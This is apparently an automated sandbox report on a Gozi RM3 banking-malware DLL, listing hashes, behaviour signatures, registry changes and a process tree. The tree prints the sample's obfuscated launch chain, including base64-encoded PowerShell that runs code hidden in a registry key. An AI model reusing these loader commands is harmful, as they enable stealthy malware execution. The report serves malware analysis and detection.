Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
07-04-2022 23:51
Static task
static1
Behavioral task
behavioral1
Sample
yA0A.tmp.dll
Resource
win7-20220331-en
General
-
Target
yA0A.tmp.dll
-
Size
151KB
-
MD5
55ab2f304f8c2da30aeee7713a95064d
-
SHA1
aae939cf3995905399e427097fc90c5b62f3d4c3
-
SHA256
41ae907a2bb73794bb2cff40b429e62305847a3e1a95f188b596f1cf925c4547
-
SHA512
08bbf78b4154f725399055dfb8a4338ce873297af847a5e30c8b6708e44feeae071fbf7efff9ff2c0b397fdffec5ca52a9591f742092a8f50287e54ce89307d3
Malware Config
Extracted
gozi_rm3
-
build
300994
Signatures
-
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.
-
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2070713945" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000d0858bd85ae385d761ec3e56f7064774fce0f6a02fd5ac0ed5d10402e4739854000000000e8000000002000020000000196473e4a4332a50f1dde6d515a99a400e5ff283720f14311d16e7d4ab1b92fcd00000000346b006c5db61d7da7b358b1e3e60ec65769c6d4d849d250c4b6123800be6c9d93302ea8b5bcedce0805141e6b3b396a9e3f3fb3220042cf65776d9abed35ac23e6223cdb7a1bb003fb1d6d67825acd947920d2a4c95b0581248e9198a978c9e94c3d646732468e725fad78219e4f93c53956c74a691616c07b04c21dbe59e89553d6df071f6814e973e47125c92b27fab431f231f2e93cb83cbed1dd8f23025f57333f72b040bb469a5bdbe8a47b9cf3cec889ed4bf78bc41d1c4593e1655e1c016cbf87a0993f4b855b522830a41a4000000090f54783b340ac0fdbc089073af8a6e0cadd8abb9fbcc739a042fc1f4287e6a3f2744a765f5bd8fc81f5cec8f75de00b730e4edb4259ba2022cf8ff5b9ee0435 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 00995f6cda4ad801 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000cf16a1f41a8ff0e8076066f756103edf741ce7a9387a5c3a64e8cd9342d55248000000000e800000000200002000000068e79cec5d73f155b19757e0b2c12ddedc0d9cdadbd37d1f3fb1912fa1991f1ed00000008c702cb32d39b8f28128c2c9b1d4235ea3737c9e90420a4693c0b3110450335f091bbc3566760d92396c317533fc7ede63b9a2164bc641833ba6a1baab405872c9a9c41a5bff7b41127bdfd40c0e80f36336fea54d9bf26ce288c1e12c9449a4586a70beecddf9dee330a7776d193e0aa1ee7a3021cbb43c0456ce54a330fcff0edac10a20d1a2f8c50bbb1742804d9fc0f63008d9f26222d179095f5cb957fe5d19efee438c295c7c483b43104e7b4f66a5b8e865cd457c881e589942cfc32aa3a244f8a8be00f1edf8f423ab2a99ea40000000d85782f4bd7d55039f135bc5ed227b4c183ebc238207767b0cbf7ed91c7b7d44449062c4b8cd0a6ce87a112f7fe734fa3f0adfa116cee299d00cf98aae24a547 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000b657a625b174594c248694b53ee9fd89c1c8e2b54dd57fb3f28ad2b4886f8d8a000000000e80000000020000200000008125e7151b77df7082566d6671102fb600ad614636cbd1ab1ff47737e245124a2000000055bc7e6ce7065fc6e94efbe98323cf8dd5af55bacc9731f06a297a0c76d3d8ed400000009fc169a8aa5dd67fc6115830d39b87c74b7a93fe538215ad31f2dc338b7cf0b4ff63c1ff2bd5d032ad165bb0c7193330b0db3cfe92802dfafb4caaf1984a1a98 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a0000000002000000000010660000000100002000000032dbd963fd1e56e3c475a655ae0cac9da0604483b41ab7c516bdb4f9f14f8206000000000e8000000002000020000000fdcdb1ea92a0b4025f58ae10c400dddeb07ab547529ba9571965e011e67dab2ad0000000aad3aaf1cd8207bfe6e74f55f1d47b9652782e3b93a132195289e4016c153d67b841a984af9c1ac1daac3e2a12681a461afb860320f78181fa96032394948ae89c17f153d85483227e03d00be8131d454d0bb6b79982ca7d8c06e4b10b0c2e00ede1dfdba1177cf815380d5ba4a606ba512d28d7a64da014e9948523b8f8af2d4968af328ee092c819b3a1bca8310a9ce9d5ef03bdc9a5af2ed718fbcf0e95e76facfbaf1121eeb09e8e871f3b33afd47296e67bdba833d5772b4143ca85c44874ab7ed63a51091949570ef0292a675a40000000d2c801f10b6e12cf07d0dc2bdcbc91f09c26870d81bc755d0fbb1ea31f198f8c70c4e16a31ddfc9d8bb8d835224b3ea6c7d214b21d6c10353f4371c51c4d926e iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3400000034000000ba04000099020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff1a0000001a000000a00400007f020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000ffe99bd0421824bb28dc52007b75b6db7bf08b9436c2bddec6f11b6f9fc2b5cc000000000e80000000020000200000005c03c1659680559269af6c1e674e171725480665f15bc22e6d4ea50f4acb836dd0000000828e82bea11c44f7121c18ec7fd55d810c38fbfb553f92f1b17d0ecdab6cd8130b6801623464323086a0962509bd37c6ec3ce09525945ab31ad07d7593793ddd6da2089dd471913f55930ed9fd3b60bd56df86944fb8bbdfd3180b5fb2cae85bdd294d3d69de1fe9f277b1eb3b0faeb84e8c859e275c6f1d3ecc6aac2011a3b6f9dd8428ac6c1d763874e859a7da0675bd3ba060f0f47d33e639fbe369d8b88ffaf1f53e6afb334752e8c47b36bbbefc4c972568f564d7b7ebcec7ed45b9ff3695aeadbdd97523dba38cdc775cd8191f400000003cc3d10e3d55ed07289e9f9118f82b5449f0188b2eb666eac28de00db1aa395eb95e741e918b05d27dcae955bca323b481ce4762f022991c78ebfe3e0be43002 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{A6529C11-B6CD-11EC-B9A4-722B02EF51C8} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30952154" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000e6379cd4181ec833be4658bd9e1d7d59e6f4f9e32265857c54d396128f659dc7000000000e80000000020000200000005d07b69e82e1d8d4a9c7d13fd1a8df7307000c73ce34ad37a66165d1e058f3f4d0000000e66540c3ff7251b41c8406e4b4db5e542f8ce1bb40c9df7f1774b098e223c51cdae4d6081045755749336ba8bbacb7c7ad0d5b4e5c488d7430e22c692122e432fd32552cb8b270d85ce3b9a982a11d65d78e2fadbbaaf374a072699e076445819073f2da402d12e26cdba9c0090021fff9b45102e021ad2b0705eda694133f39c7ec3573d8930f8de2562b657a48615045a7d6fdc022bc11d0e89a5413074d8789570ef40c93e1aad2e0466f29e2f226f7867558716296c4cfc3ecdbcd72e2f4c3ec2cbc64867fe21e08d851c26b43e2400000001d2425ce5a3750168af7a4e863d2a7a0bdcac9147957d73a8b657bbcb053aa8d13604f72093631ae244bdc0340addbcc0ac5cdc86ad61d9bedfced7422983116 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80b4c76dda4ad801 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 5052 powershell.exe 5052 powershell.exe 1672 powershell.exe 1672 powershell.exe 3792 powershell.exe 3792 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 5052 powershell.exe 1648 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 5052 powershell.exe Token: SeDebugPrivilege 1672 powershell.exe Token: SeDebugPrivilege 3792 powershell.exe -
Suspicious use of FindShellTrayWindow 11 IoCs
pid Process 4496 iexplore.exe 4496 iexplore.exe 4496 iexplore.exe 4496 iexplore.exe 4496 iexplore.exe 4496 iexplore.exe 4496 iexplore.exe 4496 iexplore.exe 4496 iexplore.exe 4496 iexplore.exe 4496 iexplore.exe -
Suspicious use of SetWindowsHookEx 44 IoCs
pid Process 4496 iexplore.exe 4496 iexplore.exe 2840 IEXPLORE.EXE 2840 IEXPLORE.EXE 4496 iexplore.exe 4496 iexplore.exe 2216 IEXPLORE.EXE 2216 IEXPLORE.EXE 4496 iexplore.exe 4496 iexplore.exe 2476 IEXPLORE.EXE 2476 IEXPLORE.EXE 4496 iexplore.exe 4496 iexplore.exe 3128 IEXPLORE.EXE 3128 IEXPLORE.EXE 4496 iexplore.exe 4496 iexplore.exe 4852 IEXPLORE.EXE 4852 IEXPLORE.EXE 4496 iexplore.exe 4496 iexplore.exe 648 IEXPLORE.EXE 648 IEXPLORE.EXE 4496 iexplore.exe 4496 iexplore.exe 1948 IEXPLORE.EXE 1948 IEXPLORE.EXE 4496 iexplore.exe 4496 iexplore.exe 704 IEXPLORE.EXE 704 IEXPLORE.EXE 4496 iexplore.exe 4496 iexplore.exe 3224 IEXPLORE.EXE 3224 IEXPLORE.EXE 4496 iexplore.exe 4496 iexplore.exe 3952 IEXPLORE.EXE 3952 IEXPLORE.EXE 4496 iexplore.exe 4496 iexplore.exe 3616 IEXPLORE.EXE 3616 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 58 IoCs
description pid Process procid_target PID 1556 wrote to memory of 1648 1556 regsvr32.exe 79 PID 1556 wrote to memory of 1648 1556 regsvr32.exe 79 PID 1556 wrote to memory of 1648 1556 regsvr32.exe 79 PID 4496 wrote to memory of 2840 4496 iexplore.exe 88 PID 4496 wrote to memory of 2840 4496 iexplore.exe 88 PID 4496 wrote to memory of 2840 4496 iexplore.exe 88 PID 4496 wrote to memory of 2216 4496 iexplore.exe 90 PID 4496 wrote to memory of 2216 4496 iexplore.exe 90 PID 4496 wrote to memory of 2216 4496 iexplore.exe 90 PID 4496 wrote to memory of 2476 4496 iexplore.exe 93 PID 4496 wrote to memory of 2476 4496 iexplore.exe 93 PID 4496 wrote to memory of 2476 4496 iexplore.exe 93 PID 4496 wrote to memory of 3128 4496 iexplore.exe 94 PID 4496 wrote to memory of 3128 4496 iexplore.exe 94 PID 4496 wrote to memory of 3128 4496 iexplore.exe 94 PID 4496 wrote to memory of 4852 4496 iexplore.exe 95 PID 4496 wrote to memory of 4852 4496 iexplore.exe 95 PID 4496 wrote to memory of 4852 4496 iexplore.exe 95 PID 4496 wrote to memory of 648 4496 iexplore.exe 96 PID 4496 wrote to memory of 648 4496 iexplore.exe 96 PID 4496 wrote to memory of 648 4496 iexplore.exe 96 PID 4496 wrote to memory of 1948 4496 iexplore.exe 97 PID 4496 wrote to memory of 1948 4496 iexplore.exe 97 PID 4496 wrote to memory of 1948 4496 iexplore.exe 97 PID 4496 wrote to memory of 704 4496 iexplore.exe 98 PID 4496 wrote to memory of 704 4496 iexplore.exe 98 PID 4496 wrote to memory of 704 4496 iexplore.exe 98 PID 4496 wrote to memory of 3224 4496 iexplore.exe 99 PID 4496 wrote to memory of 3224 4496 iexplore.exe 99 PID 4496 wrote to memory of 3224 4496 iexplore.exe 99 PID 4496 wrote to memory of 3952 4496 iexplore.exe 100 PID 4496 wrote to memory of 3952 4496 iexplore.exe 100 PID 4496 wrote to memory of 3952 4496 iexplore.exe 100 PID 4496 wrote to memory of 3616 4496 iexplore.exe 102 PID 4496 wrote to memory of 3616 4496 iexplore.exe 102 PID 4496 wrote to memory of 3616 4496 iexplore.exe 102 PID 4528 wrote to memory of 4092 4528 cmd.exe 105 PID 4528 wrote to memory of 4092 4528 cmd.exe 105 PID 4092 wrote to memory of 5012 4092 forfiles.exe 107 PID 4092 wrote to memory of 5012 4092 forfiles.exe 107 PID 5012 wrote to memory of 5052 5012 cmd.exe 108 PID 5012 wrote to memory of 5052 5012 cmd.exe 108 PID 5052 wrote to memory of 1672 5052 powershell.exe 109 PID 5052 wrote to memory of 1672 5052 powershell.exe 109 PID 5052 wrote to memory of 3792 5052 powershell.exe 110 PID 5052 wrote to memory of 3792 5052 powershell.exe 110 PID 5052 wrote to memory of 676 5052 powershell.exe 111 PID 5052 wrote to memory of 676 5052 powershell.exe 111 PID 676 wrote to memory of 1800 676 csc.exe 112 PID 676 wrote to memory of 1800 676 csc.exe 112 PID 5052 wrote to memory of 4244 5052 powershell.exe 114 PID 5052 wrote to memory of 4244 5052 powershell.exe 114 PID 4244 wrote to memory of 3472 4244 csc.exe 115 PID 4244 wrote to memory of 3472 4244 csc.exe 115 PID 5052 wrote to memory of 2880 5052 powershell.exe 31 PID 1648 wrote to memory of 2880 1648 regsvr32.exe 31 PID 1032 wrote to memory of 3820 1032 iexpress.exe 119 PID 1032 wrote to memory of 3820 1032 iexpress.exe 119
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:2880
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\yA0A.tmp.dll2⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\yA0A.tmp.dll3⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e2⤵
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\system32\forfiles.exeforfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e3⤵
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\system32\cmd.exe/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit4⤵
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA==5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAGgAcgBoAGMAZQB3AGQAYQB4AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAcgBoAGMAZQB3AGQAYQB4AGUAKQAnAA==6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAGQAZgBvAG0AaABlAGwAcwBvAGgAKQA7AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGYAbwBtAGgAZQBsAHMAbwBoACkAJwA=6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pymhmkiv\pymhmkiv.cmdline"6⤵
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD61A.tmp" "c:\Users\Admin\AppData\Local\Temp\pymhmkiv\CSCD9EFD89091A542C0AB23B90E33CBD27.TMP"7⤵PID:1800
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tj14rzcz\tj14rzcz.cmdline"6⤵
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD723.tmp" "c:\Users\Admin\AppData\Local\Temp\tj14rzcz\CSCA35C116F4DFFA2C946F7586C126.TMP"7⤵PID:3472
-
-
-
-
-
-
-
C:\Windows\syswow64\svchost.exeC:\Windows\syswow64\svchost.exe2⤵PID:1216
-
-
C:\Windows\system32\iexpress.exeiexpress.exe /n /q /m C:\Users\Admin\AppData\Local\Temp\D055.bin2⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\system32\makecab.exeC:\Windows\system32\makecab.exe /f "C:\Users\Admin\~Oldday.DDF"3⤵PID:3820
-
-
-
C:\Program Files (x86)\Internet Explorer\ielowutil.exe"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding1⤵PID:3456
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4496 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2840
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4496 CREDAT:17414 /prefetch:22⤵
